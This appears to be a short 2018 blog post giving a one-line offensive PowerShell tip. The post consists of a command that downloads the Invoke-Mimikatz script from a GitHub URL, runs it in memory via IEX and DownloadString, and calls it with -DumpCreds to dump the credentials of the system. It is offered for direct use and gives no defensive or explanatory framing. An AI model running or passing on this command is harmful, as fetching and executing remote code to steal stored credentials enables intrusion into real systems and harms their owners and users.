Wednesday 10 October 2018

Invoke-Mimikatz and will dump the creds of the respective system.

This runs the powershell script by directly pulling it from Github and executing it "in memory" on your system.

IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1’) ; Invoke-Mimikatz -DumpCreds